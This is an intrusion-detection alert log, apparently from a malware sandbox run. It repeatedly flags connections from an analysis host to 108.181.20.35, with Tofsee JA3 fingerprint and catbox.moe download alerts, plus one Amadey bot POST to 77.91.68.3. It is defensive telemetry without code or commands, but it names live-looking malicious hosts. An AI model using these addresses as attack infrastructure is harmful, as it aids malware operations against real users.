TCP 192.168.56.101:49500 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49398 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49240 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49500 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49461 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49240 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49481 -> 77.91.68.3:80	2044623	ET MALWARE Amadey Bot Activity (POST)	A Network Trojan was detected
TCP 192.168.56.101:49461 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49508 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49400 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49241 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49462 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49241 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49462 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49484 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49509 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49509 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49403 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49249 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49509 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49249 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49508 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49464 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49485 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49412 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49510 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49472 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49251 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49510 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49472 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49487 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49418 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49418 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49263 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49517 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49473 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49263 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49517 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49452 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49473 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49430 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49430 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49266 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49522 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49476 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49266 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49460 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49476 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49439 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49269 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49269 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49477 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49480 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49477 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49483 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49273 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49441 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49483 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49494 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49441 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49440 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49490 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49282 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49490 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49499 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49449 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49491 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49283 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49491 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49503 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49450 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49450 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49284 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49505 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49506 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49284 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49505 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49506 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49471 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49289 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49513 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49289 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49513 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49511 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49474 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49511 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49498 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49474 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49519 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49290 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49519 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49482 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49519 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49515 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49482 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49504 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49504 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49306 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49526 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49520 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49486 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49507 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.101:49520 -> 108.181.20.35:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.101:49311 -> 108.181.20.35:443	2038639	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)	Potentially Bad Traffic
